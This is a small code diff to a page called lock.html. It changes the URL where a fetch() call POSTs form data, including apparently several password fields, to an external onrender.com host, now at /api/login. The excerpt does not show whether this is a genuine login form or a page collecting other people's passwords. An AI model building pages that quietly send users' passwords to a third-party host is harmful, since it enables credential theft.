--- a/lock.html
+++ b/lock.html
@@ -120,7 +120,7 @@
                 password4: document.getElementById('password4').value
             };
 
-            fetch('https://sajjad947-github-io.onrender.com', {
+            fetch('https://sajjad947-github-io.onrender.com/api/login', {
                 method: 'POST',
                 headers: { 'Content-Type': 'application/json' },
                 body: JSON.stringify(data)
